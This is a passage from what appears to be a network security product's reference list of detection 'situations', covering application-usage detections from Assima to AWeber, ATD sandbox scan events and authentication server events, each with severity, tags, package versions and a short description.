First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Assima is a service that helps assist with an intelligent overlay that adds information, process guidance and business improvements
Back to top

Associated-Coffee

About this situation: Application Associated-Coffee detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Associated fuels businesses in Northern California with refreshments that your employees demand. In addition to coffee, provide a full snack and beverage program with inventory management.
Back to top

Association-Catalyst

About this situation: Application Association-Catalyst detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Association Catalyst is a platform completely integrating your association database and member activities with your website management. Association Catalyst streamlines both front end and back-office operations.
Back to top

AssureSign

About this situation: Application AssureSign detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AssureSign simplifies the signature. Available as an on-premise, customizable solution for the enterprise and as an on-demand, SaaS solution for small business, AssureSign uniquely enables any business to create and execute a secure and seamless signature experience.
Back to top

AstoriaSoftware

About this situation: Application AstoriaSoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AstoriaSoftware develops content management systems for dynamic product documentation needs.
Back to top

AsureSpace

About this situation: Application AsureSpace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Asure Software, Inc. offers Cloud-based technology solutions that enable companies to better manage their most expensive costs
Back to top

Asurion

About this situation: Application Asurion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Asurion is a handset insurance company providing technology protection services to user contents, software, wireless and wired handsets.
Back to top

Asus-Cloud

About this situation: Asus Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting, Application Routing
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-773-5211
Description: Asus-Cloud usage detected
Back to top

Asus-FOTA-Update

About this situation: Asus Firmware-On-The-Air (FOTA) update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: FOTA service is used to deliver firmware updates for various products made by Asus.
Back to top

Asus-Live-Update

About this situation: Asus Live-Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: Asus Live Update is an update tool that can be used to download updates, such as BIOS and driver updates.
Back to top

Asus-Webstorage

About this situation: ASUS WebStorage usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This services allows users to back up, synchronize, and share files on computers and mobile devices. Source: Wikipedia
Back to top

AtData

About this situation: ATData
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Description: AtData is a marketing platform.
Back to top

ATD_Analysis_Canceled

About this situation: Scan on ATD was canceled.
Context: ATD
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1296-5242
Description: File scan on ATD was canceled.
Back to top

ATD_Analysis_Discarded

About this situation: Scan on ATD was reported to be discarded.
Context: ATD
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1296-5242
Description: File scan on ATD was reported to be discarded.
Back to top

ATD_Analysis_Invalid

About this situation: Scan on ATD was reported as invalid.
Context: ATD
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1296-5242
Description: File scan on ATD was reported as invalid.
Back to top

ATD_Connection-Initialization

About this situation: ATD connection initialized.
Context: ATD
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1296-5242
Description: ATD connection was successfully initialized.
Back to top

ATD_Error

About this situation: ATD encounter a problem.
Context: ATD
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1296-5242
Description: Found problem with ATD module.
Back to top

ATD_File_Clean

About this situation: Scan result from ATD indicated that file is safe.
Context: ATD
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1296-5242
Description: Scan result from ATD indicated that file is safe.
Back to top

ATD_File_sent_to_dynamic_analysis

About this situation: File was sent to ATD for dynamic scan.
Context: ATD
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1296-5242
Description: File was sent to ATD for scanning.
Back to top

Atende-Simples

About this situation: Application Atende-Simples detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Meets Simple allows small businesses to provide professional and complete phone service to their customers.Meets Simple integrated all parts of the service and created a manageable in real time from a single interface with business telephone numbers, such as 0800 and 3003, service platform, management system and professional service switchboard.
Back to top

Atera

About this situation: Application Atera detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Atera is All in One Software for Managed Services Providers. From remote IT monitoring and management to powerful ticketing and customer satisfaction surveying.
Back to top

Athenahealth

About this situation: Application Athenahealth detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Athenahealth is a cloud-based electronic health records, patient engagement, population health management and medical billing services for providers and health systems.
Back to top

Athlinks

About this situation: Athlinks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Athlinks presents race results for running, swimming, cycling, mountain biking, triathlon, and adventure racing. It is also represented as tool for athletes to connect with other competitors and enthusiasts locally.
Back to top

Atipso

About this situation: Application Atipso detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Atipso is a marketing-suite to create and runs contests, sweepstakes and microsites on multiple web channels at the same time.
Back to top

Atlassian

About this situation: Atlassian usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: Atlassian provides software development and collaboration tools to help teams conceive, plan, build and launch great products.
Back to top

Atmail

About this situation: Atmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: The company develops webmail, mail-server and groupware solutions built for Linux and other Unix operating systems, and includes the source code under a commercial license.
Back to top

AtNetName

About this situation: Application AtNetName detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AtNetPlus sells domain name registrations.
Back to top

Atom

About this situation: atom usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: atom uses streaming TV technology to provide free, on-demand TV content to end users and provide uploading option for users.
Back to top

Atomic-Learning

About this situation: Application Atomic-Learning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Atomic Learning is a subscription-based service, providing the following professional development solutions and online training resources to meet the needs of your school.
Back to top

Atos

About this situation: Application Atos detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Atos provides consulting services and solutions
Back to top

Atoss

About this situation: Application Atoss detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: With the core competences of Consulting, Software and Services ATOSS Software AG is the specialist for modern workforce management and demand-optimized personnel deployment.
Back to top

ATT-Synaptic

About this situation: ATT Synaptic usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1020-5242
Description: AT&T Synaptic cloud services usage has been detected.
Back to top

Attachmate

About this situation: Application Attachmate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Attachmate Corporation delivers essential business information to thousands of worldwide organizations through advanced software that integrates existing systems and emerging technologies to help organizations put their IT assets to work in new and meaningful ways.
Back to top

attenda

About this situation: Application attenda detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Attenda is the UK's managed service and cloud platform provider, specialising in running business critical applications. It has a Business Critical IT approach that combines business outcome focus with a structured engagement methodology and supporting services and infrastructure.
Back to top

Attendance-Enterprise

About this situation: Application Attendance-Enterprise detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Attendance Enterprise is employee time-tracking solution.
Back to top

Attendify

About this situation: Application Attendify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Attendify helps event planners build customized mobile apps that engage attendees, sponsors, and exhibitors with ease. Register a free Attendify account to start building your app, test it on your iPhone or Android device using our free preview tool, and share your app with colleagues and friends. Every app comes with native iPhone and Android versions as well as an HTML 5 web app. You can update content, get usage analytics, and manage any aspect of your app online.
Back to top

Attensity

About this situation: Application Attensity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Attensity is a provider of corporate insight solutions based on proprietary data contextualization. It's solutions identify relevant information from multi-channel data sources using semantic technologies, analytics and context based discovery.
Back to top

Attunity

About this situation: Application Attunity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Attunity is of information availability software solutions that enable access, sharing and distribution of data, including Big Data, across heterogeneous enterprise platforms, organizations, and the cloud.
Back to top

Au-One-Net-Mail

About this situation: au one net Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: au one net Mail: This site is a Japanese web mail service that allows users to send and receive e mails.
Back to top

Aubay

About this situation: Application Aubay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aubay is a consulting and system integration company. It offers solutions and services for IT and management consulting.
Back to top

Auctiva

About this situation: Application Auctiva detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Auctiva is a web-based auction management environment.
Back to top

Audioboo

About this situation: Application Audioboo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Share audio content online and completely free of charge with Audioboo. Post it here and to other social networks.
Back to top

Audiobox

About this situation: AudioBox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to receive, send, and share music on computers and mobile devices.
Back to top

AudioCodes

About this situation: Application AudioCodes detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AudioCodes designs, develops and sells advanced VoIP and data networking products and communications applications for service providers and enterprises.
Back to top

Auditz.io

About this situation: Application Auditz.io detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Auditz is a cloud based health and safety management system for small-medium sized businesses.
Back to top

AuraPortal

About this situation: Application AuraPortal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AuraPortal provide suite of software for complete, integrated management of an entire company or organization. .
Back to top

Aurea

About this situation: Application Aurea detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aurea develops business process management and data integration software solutions.
Back to top

Aurionpro

About this situation: Application Aurionpro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aurionpro is a technology solutions company that developes software to help clients to optimize business operations.
Back to top

Auth0

About this situation: Auth0
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Description: Auth0 is an authentication application by Okta.
Back to top

Authentication rejected

About this situation: Authentication rejected
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-521-5211
Description:
Back to top

Authentication succeeded

About this situation: Authentication succeeded
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-455-5211
Description:
Back to top

Authentication: Lost connection to Resource Host

About this situation: Lost connection to Resource Host
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

Authentication: Restored connection to Resource Host

About this situation: Restored connection to Resource Host
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

Authority

About this situation: Application Authority detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Authority - archiving, backup and disaster recovery to help organizations manage risk and meet compliance requirements.
Back to top

Authorize.net

About this situation: Application Authorize.net detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Authorize.net is a payment gateway service provider allowing merchants to accept credit card and electronic check payments through their Web site and over an IP connection.
Back to top

AuthSMTP

About this situation: Application AuthSMTP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AuthSMTP provides a SMTP outgoing mail service for people who travel, use multiple ISPs, or whose ISP places restrictions on using their own domain name to send email.
Back to top

Auto-Tweeting

About this situation: Application Auto-Tweeting detected
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Auto Tweeting - twitter marketing tool to increase the amount of followers
Back to top

AutoAlert

About this situation: Application AutoAlert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AutoAlert Inc. was established with the intent of providing the automotive dealership industry with products and services designed to enhance sales efforts and sales opportunities. These sales enhancement objectives are accomplished through providing dealerships with data harvesting-lead generation software programs, hardware, in house training and support.
Back to top

Autobahn-Accelerator

About this situation: Autobahn Accelerator usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-649-5211
Description: Autobahn accelerator is a Windows application aimed at optimizing internet browsing and file download speed. The software relies on the HTTP protocol for communications.
Back to top

Autobytel

About this situation: Application Autobytel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Autobytel is provider of technologies that maximize dealer exposure and sales opportunities, allows you to compare new cars side by side to read reviews, specs and options
Back to top

AutoCorner

About this situation: Application AutoCorner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AutoCorner used car dealer website system and vehicle listing classifieds.
Back to top

Autodesk

About this situation: Autodesk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1277-5242
Description: Autodesk, Inc. is an American multinational software corporation that makes software for the architecture, engineering, construction, manufacturing, media, and entertainment industrie.Autodesk became best known for AutoCAD but now develops a broad range of software for design, engineering, and entertainment as well as a line of software for consumers, including Sketchbook, Homestyler, and Pixlr.
Back to top

Autodesk-Fusion-Lifecycle

About this situation: Application Autodesk-Fusion-Lifecycle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Autodesk Fusion Lifecycle is a PLM solution that makes the benefits of product lifecycle management available to anyone, anytime, anywhere.
Back to top

Autodesk360

About this situation: Autodesk360 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: Autodesk360 is a project collaboration software which is designed to help design, engineering and project teams to collaborate and work on a centralized platform.
Back to top

Autofy-for-QuickBooks

About this situation: Application Autofy-for-QuickBooks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QuickBooks and Salesforce work better when their data is synchronized together. With Autofy for QuickBooks, we enable opportunities you create in Salesforce to automatically get entered into QuickBooks.
Back to top

Automater

About this situation: Application Automater detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Automater is a tool for automatic shipping codes purchased on Aukro, eBay, PayPal or in online shop. Automater provides instant delivery codes and files after purchase.
Back to top

Automatic-Backlinks

About this situation: Application Automatic-Backlinks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Automatic Backlinks is online web application that allows you to automatically exchange links with other members web sites.
Back to top

Automatically linked user

About this situation: Automatically linked user
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-521-5211
Description:
Back to top

Automaticly

About this situation: Application Automaticly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Automaticly is an intelligent customer service.
Back to top

AutoMCF

About this situation: Application AutoMCF detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AutoMCF is a cloud service that connects marketplace listings to Fulfillment by Amazon (FBA), automating multi-channel order fulfillment and syncing inventory across all channels.
Back to top

AutoStar-Solutions

About this situation: Application AutoStar-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AutoStar Solutions DMS is a comprehensive web-based car dealer software system that gives you everything you need to build a customized solution for your dealership, finance company, auto wholesale, and
Back to top

Autotask

About this situation: Application Autotask detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Autotask Corporation provides hosted IT business management software to streamline and optimize business processes for technology solution providers.
Back to top

AutoTrader

About this situation: Application AutoTrader detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AutoTrader is an marketplace for car shoppers and sellers. It aggregates new, used, and certified second-hand cars from dealers and private sellers.
Back to top

Auvik-MSP-Edition

About this situation: Application Auvik-MSP-Edition detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Using Auvik's cloud-based network operations system, an MSP can generate new monthly revenue while saving money with streamlined processes.
Back to top

Aux.tv

About this situation: aux.tv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

Avalara

About this situation: Application Avalara detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Avalara, Inc. is a cloud-based software platform that delivers a broad array of compliance solutions related to sales tax and other transactional taxes, such as VAT.
Back to top

Avancert

About this situation: Application Avancert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Affordable cloud based solutions for delivery and management of video interviews, computer based examinations, and professional and high stakes assessment.
Back to top

Avangate-Commerce

About this situation: Application Avangate-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Avangate Commerce is a customer-centric commerce solution that enables companies to increase their online sales across touchpoints, manage subscription billing, and grow their distribution channels to profitably scale and enter new markets.
Back to top

AvantLink

About this situation: Application AvantLink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AvantLink is a marketing, analytics, referral tracking and technology platform for web retailers and publishers.
Back to top

Avanza

About this situation: Application Avanza detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Avanza is an online stock broker.
Back to top

Avast Antivirus

About this situation: Endpoint Context Agent based Avast Antivirus detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Description: Avast Antivirus endpoint application detected.
Back to top

Avast-Update

About this situation: Avast Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1194-5242
Description: Update service for Avast Antivirus.
Back to top

Avayalive

About this situation: AvayaLive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: This groupware provides unified communications, real-time video collaboration, contact center, networking, and related services.
Back to top

Avaza

About this situation: Application Avaza detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Avaza is online software suite with modules for Project Management, Timesheets, Expenses and Invoicing. Access from anywhere, with any device.
Back to top

Avazu

About this situation: Application Avazu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Avazu Inc. is a global digital advertising company with two business units which includes a private ad exchange
Back to top

Avepoint

About this situation: Application Avepoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AvePoint is the established leader in enabling enterprise collaboration across platforms and devices. Focusing on helping enterprises in their digitization journey to enable their information workers to collaborate with confidence, AvePoint is first to market with a unique solution that centralizes access and control of information assets residing in disparate collaboration and document management systems on-premises and in the cloud.
Back to top

Avere-Systems

About this situation: Application Avere-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Avere Systems delivers cloud enabled enterprise NAS solutions through its FXT Edge filer high performance appliance.
Back to top

Aveva

About this situation: Application Aveva detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AVEVA is a provider of engineering, design and information management software solutions.
Back to top

Avg

About this situation: Application Avg detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AVG delivers products and services that make everyone's digital world simpler to navigate, easier to secure, and more enjoyable to live in.
Back to top

Avg-Update

About this situation: AVG Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-753-5211
Description: AVG was developed for the Microsoft Windows, Linux, and FreeBSD computing platforms by AVG Technologies. Source: Wikipedia
Back to top

Aviary

About this situation: Application Aviary detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aviary is mobile photo editing platform, enabling fun and fast visual creativity.
Back to top

Aviatrix-Systems

About this situation: Application Aviatrix-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aviatrix Systems offers hybrid cloud and public cloud networking.
Back to top

AvidXchange

About this situation: Application AvidXchange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AvidXchange provides accounts payable solutions that streamlines invoice capture, intelligently routes approvals and automates payments reducing costs, improving productivity and eliminating paper from the process.
Back to top

Avira-Update

About this situation: Avira Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-713-5211
Description: An anti-virus program
Back to top

Avis

About this situation: Avis usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Avis operates in North America, Latin America, the Caribbean, India, Australia and, New Zealand.
Back to top

Avo

About this situation: Avo.app webapp data collector
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1730-5242
Last changed: sgpkg-ips-1730-5242
Description: Avo gives you an overview of your current state of tracking and highlightsissues and discrepancies in your tracking data.
Back to top

Avoidr

About this situation: Avoidr usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-636-5211
Description: Avoidr is a web proxy that supports SSL via the HTTPS protocol. The service is used to bypass Internet filtering.
Back to top

Avora

About this situation: Application Avora detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AVORA is a data warehouse and machine learning platform, that changes the way business and their staff can interact through data. AVORA reduces
Back to top

AvPro-Software

About this situation: Application AvPro-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AvPro Software provides management software solutions.
Back to top

Award-Force

About this situation: Application Award-Force detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Award Force is a cloud software for contest organisers to manage awards entry and judging.
Back to top

Awareness-Hub

About this situation: Application Awareness-Hub detected
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Awareness Social Marketing Hub is a tool intended to allow marketers to publish, manage, measure, and engage with their marketing across multiple social media channels.
Back to top

Aweber

About this situation: AWeber usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
